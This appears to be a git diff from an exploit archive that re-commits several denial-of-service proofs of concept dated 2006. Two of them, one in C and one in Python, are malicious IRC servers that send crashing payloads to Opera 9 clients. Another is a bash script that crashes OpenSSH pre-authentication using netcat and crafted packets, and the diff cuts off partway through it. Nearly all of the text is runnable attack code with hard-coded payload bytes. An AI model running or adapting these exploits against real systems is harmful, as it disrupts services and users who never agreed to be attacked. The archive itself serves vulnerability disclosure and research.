- if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr))
- == -1) {
- perror("bind");
- exit(1);
- }
-
- if (listen(sockfd, BACKLOG) == -1) {
- perror("listen");
- exit(1);
- }
-
- sa.sa_handler = sigchld_handler; // reap all dead processes
- sigemptyset(&sa.sa_mask);
- sa.sa_flags = SA_RESTART;
- if (sigaction(SIGCHLD, &sa, NULL) == -1) {
- perror("sigaction");
- exit(1);
- }
-
- while(1) { // main accept() loop
- sin_size = sizeof(struct sockaddr_in);
- if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr,
- &sin_size)) == -1) {
- perror("accept");
- continue;
- }
- printf("server: got connection from %s\n",
- inet_ntoa(their_addr.sin_addr));
- if (!fork()) { // this is the child process
- int sentBytes = 0;
- close(sockfd); // child doesn't need the listener
- if ((sentBytes = send(new_fd, die, sizeof(die), 0)) == -1)
- perror("send");
- printf("sent %d bytes\n", sentBytes);
- sentBytes = 0;
-
close(new_fd);
- exit(0);
- }
- close(new_fd); // parent doesn't need this
- }
-
- return 0;
-}
-
-// milw0rm.com [2006-08-13]
+/*
+ * Opera 9 IRC client DOS exploit
+ * by Preddy and NNP
+ *
+ * http://www.smashthestack.org
+ * http://silenthack.co.uk
+ * http://www.team-rootshell.com
+ *
+ * 12 August 2006
+ *
+ */
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#define MYPORT 6667
+
+#define BACKLOG 10
+
+// : KICK\r\n
+
+char die[] = {
+ 0x3a, 0x20, 0x4b, 0x49, 0x43, 0x4b, 0x0d, 0x0a, 0x00 };
+
+void sigchld_handler(int s)
+{
+ while(waitpid(-1, NULL, WNOHANG) > 0);
+}
+
+int main(void)
+{
+ int sockfd, new_fd;
+ struct sockaddr_in my_addr;
+ struct sockaddr_in their_addr;
+ socklen_t sin_size;
+ struct sigaction sa;
+ int yes=1;
+
+ if ((sockfd = socket(PF_INET, SOCK_STREAM, 0)) == -1) {
+ perror("socket");
+ exit(1);
+ }
+
+ if (setsockopt(sockfd,SOL_SOCKET,SO_REUSEADDR,&yes,sizeof(int)) == -1) {
+ perror("setsockopt");
+ exit(1);
+ }
+
+ my_addr.sin_family = AF_INET;
+ my_addr.sin_port = htons(MYPORT);
+ my_addr.sin_addr.s_addr = INADDR_ANY;
+ memset(&(my_addr.sin_zero), '\0', 8);
+
+ if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(struct sockaddr))
+ == -1) {
+ perror("bind");
+ exit(1);
+ }
+
+ if (listen(sockfd, BACKLOG) == -1) {
+ perror("listen");
+ exit(1);
+ }
+
+ sa.sa_handler = sigchld_handler; // reap all dead processes
+ sigemptyset(&sa.sa_mask);
+ sa.sa_flags = SA_RESTART;
+ if (sigaction(SIGCHLD, &sa, NULL) == -1) {
+ perror("sigaction");
+ exit(1);
+ }
+
+ while(1) { // main accept() loop
+ sin_size = sizeof(struct sockaddr_in);
+ if ((new_fd = accept(sockfd, (struct sockaddr *)&their_addr,
+ &sin_size)) == -1) {
+ perror("accept");
+ continue;
+ }
+ printf("server: got connection from %s\n",
+ inet_ntoa(their_addr.sin_addr));
+ if (!fork()) { // this is the child process
+ int sentBytes = 0;
+ close(sockfd); // child doesn't need the listener
+ if ((sentBytes =
send(new_fd, die, sizeof(die), 0)) == -1)
+ perror("send");
+ printf("sent %d bytes\n", sentBytes);
+ sentBytes = 0;
+ close(new_fd);
+ exit(0);
+ }
+ close(new_fd); // parent doesn't need this
+ }
+
+ return 0;
+}
+
+// milw0rm.com [2006-08-13]
diff --git a/platforms/multiple/dos/2180.py b/platforms/multiple/dos/2180.py
index a132160d7..0954dda7a 100755
--- a/platforms/multiple/dos/2180.py
+++ b/platforms/multiple/dos/2180.py
@@ -1,153 +1,153 @@ -#!/usr/bin/python - -# -# Opera 9 IRC client DOS -# NNP + Preddy -# http://silenthack.co.uk -# http://smashthestack.org -# http://www.team-rootshell.com -# - -import socket - -die = '''\x3a\x61\x61\x61\x20\x33\x35\x33 -\x20\x15\xf8\x9c\x71\x0a\x3a\x64 -\xff\x26\xf8\x9b\x33\xd2\x9b\x34 -\xa4\xa7\x7d\x62\xd1\xa8\x2f\xb8 -\x9a\x85\x63\x3e\x1e\x9e\xe6\xa6 -\xb3\xde\x42\x25\xe8\x7c\x89\xe7 -\xa2\x81\x83\xd6\x53\x1e\x0a\xf7 -\xc5\x87\x59\x97\x2f\x88\x4f\xc9 -\x0d\xb2\x07\x2b\x50\xed\xd1\x03 -\xcb\x13\x28\xb3\x90\xb1\x9b\x32 -\x32\x1e\x08\x85\x3c\x13\x7c\x02 -\x9a\xd6\x99\xca\x5e\xe8\x93\x6c -\x9a\x9b\x97\xea\x88\x69\xed\x54 -\x7c\x16\x07\x0c\xc7\xa2\x3f\xfa -\xc0\x47\x7f\xfd\x5a\xfc\xff\xf5 -\xd2\x98\xbf\x30\x80\x52\x9c\x1a -\xed\x34\x04\x76\x9d\xf1\xca\x19 -\x07\xd1\x26\xcf\x74\x65\xc9\x34 -\xac\x48\x31\x07\x44\x30\xfc\x16 -\xc8\xbb\x47\x48\x0d\xe3\x62\xfb -\x17\x66\x71\xb4\x58\x3b\xce\x5f -\x0c\xf4\x2e\x80\x59\xf7\xb5\x05 -\x40\xe6\x0c\x84\x17\x08\x9b\xdf -\xc3\xe2\x28\xd1\xc5\x8a\xcc\xdd -\xf1\x3d\x91\x49\x78\x5f\xa8\x84 -\x53\xd7\x05\xac\xce\xba\xb2\x0e -\xa0\xbe\x93\xb7\xc7\x2e\x97\x8a -\x10\xbf\x5b\xd5\x49\x27\xb2\x3a -\x64\x44\x83\xdc\xa3\x2c\x61\xf7 -\x03\x66\xa3\xd1\x20\x55\xe0\xc0 -\x14\x73\x78\xdb\xa1\x0f\x65\xb1 -\xce\xc1\x86\x17\xe8\x39\x52\x4d -\x7d\xd5\x29\x20\x01\x8a\x17\x04 -\xf0\xbb\xd6\x10\x10\xb6\xd1\x24 -\x29\x49\xff\xca\x58\x65\x7b\x26 -\x26\x01\x3d\x0e\x3a\x8f\x5b\xb7 -\x65\x85\xd8\x66\x0f\xef\x6b\x00 -\xaa\x41\x10\xbb\xf7\xe1\xdf\x20 -\x2a\xdf\xea\x82\x44\x65\xa8\x6a -\x66\xe6\x78\xa1\x75\xd4\x58\xda -\x59\x30\x41\x68\x20\xac\x68\xca -\xed\x79\x85\xe4\x5a\x65\x04\x85 -\x44\xee\x07\x88\x53\xb0\xf2\xb9 -\x96\x6a\x5a\x0b\x3e\xb3\xe6\x97 -\xe3\x27\x00\x03\xd3\x68\xce\xc0 -\xe1\x53\xa4\x3c\xb8\xa8\xc1\xfc -\x96\xc8\x84\xe9\x78\x76\xa2\x0e -\xe1\xfd\x1a\x1f\xb0\x00\xb7\x93 -\x27\xb7\x97\xfa\x1f\x65\xba\x01 -\xb8\x5e\x3d\x71\x06\xfe\x6d\x9c -\xc6\xf2\x85\x3f\x68\x27\x4d\x49 -\x24\x67\x69\xd4\x67\x20\x68\x8e 
-\xd7\xff\x88\xf6\x64\x42\xf7\x1c -\xa0\x34\x8d\xa6\x32\xfb\x42\xf9 -\xed\xc7\x38\x55\xef\x85\x9f\x13 -\xed\x08\xe8\x54\x28\x50\xe3\xff -\x4f\x6b\xf5\xb3\xae\xed\xcf\x4e -\x21\x5d\xf5\x54\x58\x37\x4d\x45 -\xff\x85\x9a\xee\x0a\x39\x01\xf7 -\x41\xe9\x4c\x69\x39\x2f\x68\x88 -\x9a\x5e\x3b\x48\x4b\x0b\x97\x6c -\x68\x8c\xc0\xc0\xc3\x0d\x05\xc2 -\x92\x9f\xb0\x9d\xd9\xb2\x94\x1a -\x9b\xe0\x84\xd5\x0f\xec\x5d\xaa -\x4a\x99\xf2\x95\xa4\x89\x02\x0c -\x15\xc2\xcc\xd9\xd0\xd1\x9b\x62 -\x70\x4c\xff\x49\xfe\x94\x64\x99 -\x74\xe8\x6e\x84\xd4\xcc\x2e\x1f -\x65\x20\xb4\x09\xaa\xb6\x15\xbf -\x79\xe1\x98\x49\xb2\x34\xab\x22 -\x80\xab\x6c\x7e\x3f\xd0\x17\xb3 -\xb8\x86\x37\x8c\x52\x65\xab\xb7 -\x86\x60\xc0\x30\x16\xd5\xef\x8f -\xb6\x88\xd8\x68\xbc\x84\x8a\x3c -\x2f\xf6\xba\x6e\xc6\xd1\x21\x7e -\x57\x59\x0b\xa9\xbe\xb6\x60\x44 -\x16\x20\x74\x2d\xf5\x64\xbc\xab -\xec\x95\x13\xa8\x19\x9e\xe4\x48 -\x94\x9e\xb6\x5b\x6f\xd7\xd9\xc7 -\x30\xe4\x70\xef\x9b\xd1\x33\xb1 -\xf1\xa8\xde\xe7\x0c\x9b\x92\xf8 -\x30\xa6\xa0\x49\x44\x84\x91\xd8 -\x22\x47\x33\x91\x1e\x0d\x58\x4f -\xf1\xc9\x3e\x8c\x9a\x71\x3e\x8b -\x19\x1c\x72\x25\xb7\x05\x1d\xe7 -\xab\xbd\x30\xef\x41\xc1\xc7\x63 -\x08\xfb\xf5\x27\x08\x4d\x76\xf9 -\x16\xb4\x86\xb0\x25\xc4\x3c\x3f -\xe0\xae\x64\x98\xb3\x82\x7f\x5e -\x3f\xb0\x4d\x81\x71\x15\xe4\x7a -\x10\xd9\xa1\x18\x27\x17\x11\x3d -\xcb\x97\xee\xf0\x5b\x2a\x2f\x3c -\xd8\x94\xd4\x8c\x16\x53\xea\x55 -\x03\x38\xd6\x75\x4d\xbb\xef\x5d -\x94\x90\x75\xbb\xa7\x86\xf9\x72 -\x1e\xe7\x62\x79\x11\x92\xb5\xe9 -\x26\x89\x75\x3c\xdd\x60\x91\xe0 -\x98\x68\x55\xe5\x23\x44\x42\xb7 -\xd4\xb7\x73\x7b\x3d\x6c\xed\x5b -\x53\x50\xd5\x64\xe2\x8a\x4d\x08 -\x14\xc3\x44\xf1\x23\xd5\xd1\xbb -\x3d\x27\xa0\x60\x6b\xe2\x18\x40 -\x99\x8b\xbb\xd6\xf7\xa9\x32\x4a -\xf9\x07\xae\xdb\x91\xfb\xe3\xa5 -\xbe\x27\x96\xe1\xfc\x68\x9c\x3a -\x8f\x3c\x9a\xfa\x1e\xb2\x3a\xb7 -\x3d\xf6\x8e\x34\x9f\xc0\x7e\x98 -\xc7\x2c\x73\x58\x28\x56\xfe\xe6 -\x7d\x94\xc8\x79\xfc\x64\xb3\x8b -\xa1\x4e\x86\xbf\x00\xc0\x77\x3e 
-\xb6\x05\x72\x55\xc5\xf1\xed\x8c -\x1d\x60\xe4\x45\xb6\xe2\x2c\x33 -\x77\xf4\xad\x73\x58\x60\xff\xf9 -\xae\x85\xb9\xaf\x45\x30\xed\xfc -\x35\x5f\x51\xfa\x50\x3f\x86\x6e -\x9f\x6a\xb3\x56\x4d\xdf\x89\xc4 -\xd3\x36\x37\x2c\x97\x36\x25\x45 -\xbb\xde\xf4\x01\x0e\xe1\xfd\x43 -\x41\x4e\x3d\x91\x8d\xc3\xff\x2d -\x2e\xb3\x83\x7b\x92\x0c\x3f\x66 -\x43\x76\x92\xda\xad\xb7\x1f\x68 -\x96\x14\x69\xa4\xf5\x66\xe8\x36 -\xb5\x25\xc8\x42\xe9\xc7\x6f\x17 -\x7a\xf2\x92\x0d\xff\xd1\x73\x42 -\x47\x05\x1c\xf4\xbc\x3b\x5d\x52 -\x4f\xc6\xf7\x45\x2d\xdf\x7b\xe2 -\x04\x43\x24\xed\x0b\x94\x04\x85 -\x86\x96\x92\x85\x67\x05\xc7\xaf -''' - -s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) -s.bind(("localhost", 6667)) -s.listen(5) - -while 1: - (clientsock, address) = s.accept() - sent = clientsock.send(die) - print "Sent %d bytes" % sent - sent = 0 - -# milw0rm.com [2006-08-13] +#!/usr/bin/python + +# +# Opera 9 IRC client DOS +# NNP + Preddy +# http://silenthack.co.uk +# http://smashthestack.org +# http://www.team-rootshell.com +# + +import socket + +die = '''\x3a\x61\x61\x61\x20\x33\x35\x33 +\x20\x15\xf8\x9c\x71\x0a\x3a\x64 +\xff\x26\xf8\x9b\x33\xd2\x9b\x34 +\xa4\xa7\x7d\x62\xd1\xa8\x2f\xb8 +\x9a\x85\x63\x3e\x1e\x9e\xe6\xa6 +\xb3\xde\x42\x25\xe8\x7c\x89\xe7 +\xa2\x81\x83\xd6\x53\x1e\x0a\xf7 +\xc5\x87\x59\x97\x2f\x88\x4f\xc9 +\x0d\xb2\x07\x2b\x50\xed\xd1\x03 +\xcb\x13\x28\xb3\x90\xb1\x9b\x32 +\x32\x1e\x08\x85\x3c\x13\x7c\x02 +\x9a\xd6\x99\xca\x5e\xe8\x93\x6c +\x9a\x9b\x97\xea\x88\x69\xed\x54 +\x7c\x16\x07\x0c\xc7\xa2\x3f\xfa +\xc0\x47\x7f\xfd\x5a\xfc\xff\xf5 +\xd2\x98\xbf\x30\x80\x52\x9c\x1a +\xed\x34\x04\x76\x9d\xf1\xca\x19 +\x07\xd1\x26\xcf\x74\x65\xc9\x34 +\xac\x48\x31\x07\x44\x30\xfc\x16 +\xc8\xbb\x47\x48\x0d\xe3\x62\xfb +\x17\x66\x71\xb4\x58\x3b\xce\x5f +\x0c\xf4\x2e\x80\x59\xf7\xb5\x05 +\x40\xe6\x0c\x84\x17\x08\x9b\xdf +\xc3\xe2\x28\xd1\xc5\x8a\xcc\xdd +\xf1\x3d\x91\x49\x78\x5f\xa8\x84 +\x53\xd7\x05\xac\xce\xba\xb2\x0e +\xa0\xbe\x93\xb7\xc7\x2e\x97\x8a 
+\x10\xbf\x5b\xd5\x49\x27\xb2\x3a +\x64\x44\x83\xdc\xa3\x2c\x61\xf7 +\x03\x66\xa3\xd1\x20\x55\xe0\xc0 +\x14\x73\x78\xdb\xa1\x0f\x65\xb1 +\xce\xc1\x86\x17\xe8\x39\x52\x4d +\x7d\xd5\x29\x20\x01\x8a\x17\x04 +\xf0\xbb\xd6\x10\x10\xb6\xd1\x24 +\x29\x49\xff\xca\x58\x65\x7b\x26 +\x26\x01\x3d\x0e\x3a\x8f\x5b\xb7 +\x65\x85\xd8\x66\x0f\xef\x6b\x00 +\xaa\x41\x10\xbb\xf7\xe1\xdf\x20 +\x2a\xdf\xea\x82\x44\x65\xa8\x6a +\x66\xe6\x78\xa1\x75\xd4\x58\xda +\x59\x30\x41\x68\x20\xac\x68\xca +\xed\x79\x85\xe4\x5a\x65\x04\x85 +\x44\xee\x07\x88\x53\xb0\xf2\xb9 +\x96\x6a\x5a\x0b\x3e\xb3\xe6\x97 +\xe3\x27\x00\x03\xd3\x68\xce\xc0 +\xe1\x53\xa4\x3c\xb8\xa8\xc1\xfc +\x96\xc8\x84\xe9\x78\x76\xa2\x0e +\xe1\xfd\x1a\x1f\xb0\x00\xb7\x93 +\x27\xb7\x97\xfa\x1f\x65\xba\x01 +\xb8\x5e\x3d\x71\x06\xfe\x6d\x9c +\xc6\xf2\x85\x3f\x68\x27\x4d\x49 +\x24\x67\x69\xd4\x67\x20\x68\x8e +\xd7\xff\x88\xf6\x64\x42\xf7\x1c +\xa0\x34\x8d\xa6\x32\xfb\x42\xf9 +\xed\xc7\x38\x55\xef\x85\x9f\x13 +\xed\x08\xe8\x54\x28\x50\xe3\xff +\x4f\x6b\xf5\xb3\xae\xed\xcf\x4e +\x21\x5d\xf5\x54\x58\x37\x4d\x45 +\xff\x85\x9a\xee\x0a\x39\x01\xf7 +\x41\xe9\x4c\x69\x39\x2f\x68\x88 +\x9a\x5e\x3b\x48\x4b\x0b\x97\x6c +\x68\x8c\xc0\xc0\xc3\x0d\x05\xc2 +\x92\x9f\xb0\x9d\xd9\xb2\x94\x1a +\x9b\xe0\x84\xd5\x0f\xec\x5d\xaa +\x4a\x99\xf2\x95\xa4\x89\x02\x0c +\x15\xc2\xcc\xd9\xd0\xd1\x9b\x62 +\x70\x4c\xff\x49\xfe\x94\x64\x99 +\x74\xe8\x6e\x84\xd4\xcc\x2e\x1f +\x65\x20\xb4\x09\xaa\xb6\x15\xbf +\x79\xe1\x98\x49\xb2\x34\xab\x22 +\x80\xab\x6c\x7e\x3f\xd0\x17\xb3 +\xb8\x86\x37\x8c\x52\x65\xab\xb7 +\x86\x60\xc0\x30\x16\xd5\xef\x8f +\xb6\x88\xd8\x68\xbc\x84\x8a\x3c +\x2f\xf6\xba\x6e\xc6\xd1\x21\x7e +\x57\x59\x0b\xa9\xbe\xb6\x60\x44 +\x16\x20\x74\x2d\xf5\x64\xbc\xab +\xec\x95\x13\xa8\x19\x9e\xe4\x48 +\x94\x9e\xb6\x5b\x6f\xd7\xd9\xc7 +\x30\xe4\x70\xef\x9b\xd1\x33\xb1 +\xf1\xa8\xde\xe7\x0c\x9b\x92\xf8 +\x30\xa6\xa0\x49\x44\x84\x91\xd8 +\x22\x47\x33\x91\x1e\x0d\x58\x4f +\xf1\xc9\x3e\x8c\x9a\x71\x3e\x8b +\x19\x1c\x72\x25\xb7\x05\x1d\xe7 
+\xab\xbd\x30\xef\x41\xc1\xc7\x63 +\x08\xfb\xf5\x27\x08\x4d\x76\xf9 +\x16\xb4\x86\xb0\x25\xc4\x3c\x3f +\xe0\xae\x64\x98\xb3\x82\x7f\x5e +\x3f\xb0\x4d\x81\x71\x15\xe4\x7a +\x10\xd9\xa1\x18\x27\x17\x11\x3d +\xcb\x97\xee\xf0\x5b\x2a\x2f\x3c +\xd8\x94\xd4\x8c\x16\x53\xea\x55 +\x03\x38\xd6\x75\x4d\xbb\xef\x5d +\x94\x90\x75\xbb\xa7\x86\xf9\x72 +\x1e\xe7\x62\x79\x11\x92\xb5\xe9 +\x26\x89\x75\x3c\xdd\x60\x91\xe0 +\x98\x68\x55\xe5\x23\x44\x42\xb7 +\xd4\xb7\x73\x7b\x3d\x6c\xed\x5b +\x53\x50\xd5\x64\xe2\x8a\x4d\x08 +\x14\xc3\x44\xf1\x23\xd5\xd1\xbb +\x3d\x27\xa0\x60\x6b\xe2\x18\x40 +\x99\x8b\xbb\xd6\xf7\xa9\x32\x4a +\xf9\x07\xae\xdb\x91\xfb\xe3\xa5 +\xbe\x27\x96\xe1\xfc\x68\x9c\x3a +\x8f\x3c\x9a\xfa\x1e\xb2\x3a\xb7 +\x3d\xf6\x8e\x34\x9f\xc0\x7e\x98 +\xc7\x2c\x73\x58\x28\x56\xfe\xe6 +\x7d\x94\xc8\x79\xfc\x64\xb3\x8b +\xa1\x4e\x86\xbf\x00\xc0\x77\x3e +\xb6\x05\x72\x55\xc5\xf1\xed\x8c +\x1d\x60\xe4\x45\xb6\xe2\x2c\x33 +\x77\xf4\xad\x73\x58\x60\xff\xf9 +\xae\x85\xb9\xaf\x45\x30\xed\xfc +\x35\x5f\x51\xfa\x50\x3f\x86\x6e +\x9f\x6a\xb3\x56\x4d\xdf\x89\xc4 +\xd3\x36\x37\x2c\x97\x36\x25\x45 +\xbb\xde\xf4\x01\x0e\xe1\xfd\x43 +\x41\x4e\x3d\x91\x8d\xc3\xff\x2d +\x2e\xb3\x83\x7b\x92\x0c\x3f\x66 +\x43\x76\x92\xda\xad\xb7\x1f\x68 +\x96\x14\x69\xa4\xf5\x66\xe8\x36 +\xb5\x25\xc8\x42\xe9\xc7\x6f\x17 +\x7a\xf2\x92\x0d\xff\xd1\x73\x42 +\x47\x05\x1c\xf4\xbc\x3b\x5d\x52 +\x4f\xc6\xf7\x45\x2d\xdf\x7b\xe2 +\x04\x43\x24\xed\x0b\x94\x04\x85 +\x86\x96\x92\x85\x67\x05\xc7\xaf +''' + +s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) +s.bind(("localhost", 6667)) +s.listen(5) + +while 1: + (clientsock, address) = s.accept() + sent = clientsock.send(die) + print "Sent %d bytes" % sent + sent = 0 + +# milw0rm.com [2006-08-13] diff --git a/platforms/multiple/dos/2303.html b/platforms/multiple/dos/2303.html index 53338ca3a..e9d8877c1 100755 --- a/platforms/multiple/dos/2303.html +++ b/platforms/multiple/dos/2303.html 
@@ -1,34 +1,34 @@
-
-
-Click Me For A Test Crash
-
-
-
-# milw0rm.com [2006-09-05]
+
+
+Click Me For A Test Crash
+
+
+
+# milw0rm.com [2006-09-05]
diff --git a/platforms/multiple/dos/2444.sh b/platforms/multiple/dos/2444.sh
index 280681a37..7d6cc6393 100755
--- a/platforms/multiple/dos/2444.sh
+++ b/platforms/multiple/dos/2444.sh
@@ -1,122 +1,122 @@ -#!/bin/bash -# -# OpenSSH CRC compensation attack detection DoS PoC. -# Tavis Ormandy -# -# Yes, I really did implement crc-32 in bash. -# -# usage: script - -# victim hostname -hostname=${1:-localhost} -port=${2:-22} - -# where the fifo is created to communicate with netcat -fifo=/tmp/nc.$$ - -# make the fifos -mkfifo ${fifo}.in -mkfifo ${fifo}.out - -# pre-calculated crc32 for packet header -declare -i crc=0xb2240279 - -# crc lookup table -declare -a crc32tab=( 0x00000000 0x77073096 0xee0e612c 0x990951ba 0x076dc419 - 0x706af48f 0xe963a535 0x9e6495a3 0x0edb8832 0x79dcb8a4 0xe0d5e91e 0x97d2d988 - 0x09b64c2b 0x7eb17cbd 0xe7b82d07 0x90bf1d91 0x1db71064 0x6ab020f2 0xf3b97148 - 0x84be41de 0x1adad47d 0x6ddde4eb 0xf4d4b551 0x83d385c7 0x136c9856 0x646ba8c0 - 0xfd62f97a 0x8a65c9ec 0x14015c4f 0x63066cd9 0xfa0f3d63 0x8d080df5 0x3b6e20c8 - 0x4c69105e 0xd56041e4 0xa2677172 0x3c03e4d1 0x4b04d447 0xd20d85fd 0xa50ab56b - 0x35b5a8fa 0x42b2986c 0xdbbbc9d6 0xacbcf940 0x32d86ce3 0x45df5c75 0xdcd60dcf - 0xabd13d59 0x26d930ac 0x51de003a 0xc8d75180 0xbfd06116 0x21b4f4b5 0x56b3c423 - 0xcfba9599 0xb8bda50f 0x2802b89e 0x5f058808 0xc60cd9b2 0xb10be924 0x2f6f7c87 - 0x58684c11 0xc1611dab 0xb6662d3d 0x76dc4190 0x01db7106 0x98d220bc 0xefd5102a - 0x71b18589 0x06b6b51f 0x9fbfe4a5 0xe8b8d433 0x7807c9a2 0x0f00f934 0x9609a88e - 0xe10e9818 0x7f6a0dbb 0x086d3d2d 0x91646c97 0xe6635c01 0x6b6b51f4 0x1c6c6162 - 0x856530d8 0xf262004e 0x6c0695ed 0x1b01a57b 0x8208f4c1 0xf50fc457 0x65b0d9c6 - 0x12b7e950 0x8bbeb8ea 0xfcb9887c 0x62dd1ddf 0x15da2d49 0x8cd37cf3 0xfbd44c65 - 0x4db26158 0x3ab551ce 0xa3bc0074 0xd4bb30e2 0x4adfa541 0x3dd895d7 0xa4d1c46d - 0xd3d6f4fb 0x4369e96a 0x346ed9fc 0xad678846 0xda60b8d0 0x44042d73 0x33031de5 - 0xaa0a4c5f 0xdd0d7cc9 0x5005713c 0x270241aa 0xbe0b1010 0xc90c2086 0x5768b525 - 0x206f85b3 0xb966d409 0xce61e49f 0x5edef90e 0x29d9c998 0xb0d09822 0xc7d7a8b4 - 0x59b33d17 0x2eb40d81 0xb7bd5c3b 0xc0ba6cad 0xedb88320 0x9abfb3b6 0x03b6e20c - 0x74b1d29a 0xead54739 
0x9dd277af 0x04db2615 0x73dc1683 0xe3630b12 0x94643b84 - 0x0d6d6a3e 0x7a6a5aa8 0xe40ecf0b 0x9309ff9d 0x0a00ae27 0x7d079eb1 0xf00f9344 - 0x8708a3d2 0x1e01f268 0x6906c2fe 0xf762575d 0x806567cb 0x196c3671 0x6e6b06e7 - 0xfed41b76 0x89d32be0 0x10da7a5a 0x67dd4acc 0xf9b9df6f 0x8ebeeff9 0x17b7be43 - 0x60b08ed5 0xd6d6a3e8 0xa1d1937e 0x38d8c2c4 0x4fdff252 0xd1bb67f1 0xa6bc5767 - 0x3fb506dd 0x48b2364b 0xd80d2bda 0xaf0a1b4c 0x36034af6 0x41047a60 0xdf60efc3 - 0xa867df55 0x316e8eef 0x4669be79 0xcb61b38c 0xbc66831a 0x256fd2a0 0x5268e236 - 0xcc0c7795 0xbb0b4703 0x220216b9 0x5505262f 0xc5ba3bbe 0xb2bd0b28 0x2bb45a92 - 0x5cb36a04 0xc2d7ffa7 0xb5d0cf31 0x2cd99e8b 0x5bdeae1d 0x9b64c2b0 0xec63f226 - 0x756aa39c 0x026d930a 0x9c0906a9 0xeb0e363f 0x72076785 0x05005713 0x95bf4a82 - 0xe2b87a14 0x7bb12bae 0x0cb61b38 0x92d28e9b 0xe5d5be0d 0x7cdcefb7 0x0bdbdf21 - 0x86d3d2d4 0xf1d4e242 0x68ddb3f8 0x1fda836e 0x81be16cd 0xf6b9265b 0x6fb077e1 - 0x18b74777 0x88085ae6 0xff0f6a70 0x66063bca 0x11010b5c 0x8f659eff 0xf862ae69 - 0x616bffd3 0x166ccf45 0xa00ae278 0xd70dd2ee 0x4e048354 0x3903b3c2 0xa7672661 - 0xd06016f7 0x4969474d 0x3e6e77db 0xaed16a4a 0xd9d65adc 0x40df0b66 0x37d83bf0 - 0xa9bcae53 0xdebb9ec5 0x47b2cf7f 0x30b5ffe9 0xbdbdf21c 0xcabac28a 0x53b39330 - 0x24b4a3a6 0xbad03605 0xcdd70693 0x54de5729 0x23d967bf 0xb3667a2e 0xc4614ab8 - 0x5d681b02 0x2a6f2b94 0xb40bbe37 0xc30c8ea1 0x5a05df1b 0x2d02ef8d ); - -printf "[*] OpenSSH Pre-Auth DoS PoC by taviso@google.com\n" >&2 -printf "[*] Attacking %s...\n" $hostname >&2 - -# launch netcat coprocess -(nc -q0 $hostname $port < $fifo.in > $fifo.out; rm -f $fifo.in $fifo.out) & - -# open file descriptors to coprocess -exec 3>${fifo}.in 4<${fifo}.out - -# send identification -printf "SSH-1.8-OpenSSH DoS Demo -- taviso@google.com\n" >&3 - -# read server key and spoof bytes (i only care about the spoof bytes) -read server_identification <&4 -printf "[*] remote server identifies as %s.\n" "${server_identification}" >&2 - -# read the cookie -cookie="$(hexdump -n 18 
-e '"" 8/1 "%02x " " "'<&4 | cut -d" " -f11-18)" - -printf "[*] IP spoofing cookie was %s.\n" "${cookie}" >&2 - -# now send my response -printf "\x00\x00\x08\x3d" >&3 # packet length -printf "\x00\x00\x00\x03" >&3 # packet type -printf "\x03" >&3 # cipher type - -# print spoof bytes -printf "\x${cookie// /\x}" >&3 - -# now calculate checksum of spoof bytes -for i in ${cookie}; do - declare -i buf=0x${i} - let 'crc = crc32tab[(crc ^ buf) & 0xff] ^ (crc >> 8)' -done - -# now send some random crap for padding. -for ((i = 0; i < 2095; i++)); do - printf "\x41" >&3 - let 'crc = crc32tab[(crc ^ 0x41) & 0xff] ^ (crc >> 8)' -done - -printf "[*] checksum should be %#x\n" $crc >&2 - -# now send the checksum to server -printf "$(printf "\\\x%x\\\x%x\\\x%x\\\x%x" $(((crc >> 24) & 0xff)) \ - $(((crc >> 16) & 0xff)) \ - $(((crc >> 8) & 0xff)) \ - $(((crc >> 0) & 0xff)))" >&3 - -printf "\x00\x03\xff\xf8" >&3 # packet length - -# junk -perl -e 'print "\x00"x"262144"' >&3 - -# close file descriptors -exec 3>&- 4<&- - -printf "[*] All done.\n" >&2 - -# milw0rm.com [2006-09-27] +#!/bin/bash +# +# OpenSSH CRC compensation attack detection DoS PoC. +# Tavis Ormandy +# +# Yes, I really did implement crc-32 in bash. 
+# +# usage: script + +# victim hostname +hostname=${1:-localhost} +port=${2:-22} + +# where the fifo is created to communicate with netcat +fifo=/tmp/nc.$$ + +# make the fifos +mkfifo ${fifo}.in +mkfifo ${fifo}.out + +# pre-calculated crc32 for packet header +declare -i crc=0xb2240279 + +# crc lookup table +declare -a crc32tab=( 0x00000000 0x77073096 0xee0e612c 0x990951ba 0x076dc419 + 0x706af48f 0xe963a535 0x9e6495a3 0x0edb8832 0x79dcb8a4 0xe0d5e91e 0x97d2d988 + 0x09b64c2b 0x7eb17cbd 0xe7b82d07 0x90bf1d91 0x1db71064 0x6ab020f2 0xf3b97148 + 0x84be41de 0x1adad47d 0x6ddde4eb 0xf4d4b551 0x83d385c7 0x136c9856 0x646ba8c0 + 0xfd62f97a 0x8a65c9ec 0x14015c4f 0x63066cd9 0xfa0f3d63 0x8d080df5 0x3b6e20c8 + 0x4c69105e 0xd56041e4 0xa2677172 0x3c03e4d1 0x4b04d447 0xd20d85fd 0xa50ab56b + 0x35b5a8fa 0x42b2986c 0xdbbbc9d6 0xacbcf940 0x32d86ce3 0x45df5c75 0xdcd60dcf + 0xabd13d59 0x26d930ac 0x51de003a 0xc8d75180 0xbfd06116 0x21b4f4b5 0x56b3c423 + 0xcfba9599 0xb8bda50f 0x2802b89e 0x5f058808 0xc60cd9b2 0xb10be924 0x2f6f7c87 + 0x58684c11 0xc1611dab 0xb6662d3d 0x76dc4190 0x01db7106 0x98d220bc 0xefd5102a + 0x71b18589 0x06b6b51f 0x9fbfe4a5 0xe8b8d433 0x7807c9a2 0x0f00f934 0x9609a88e + 0xe10e9818 0x7f6a0dbb 0x086d3d2d 0x91646c97 0xe6635c01 0x6b6b51f4 0x1c6c6162 + 0x856530d8 0xf262004e 0x6c0695ed 0x1b01a57b 0x8208f4c1 0xf50fc457 0x65b0d9c6 + 0x12b7e950 0x8bbeb8ea 0xfcb9887c 0x62dd1ddf 0x15da2d49 0x8cd37cf3 0xfbd44c65 + 0x4db26158 0x3ab551ce 0xa3bc0074 0xd4bb30e2 0x4adfa541 0x3dd895d7 0xa4d1c46d + 0xd3d6f4fb 0x4369e96a 0x346ed9fc 0xad678846 0xda60b8d0 0x44042d73 0x33031de5 + 0xaa0a4c5f 0xdd0d7cc9 0x5005713c 0x270241aa 0xbe0b1010 0xc90c2086 0x5768b525 + 0x206f85b3 0xb966d409 0xce61e49f 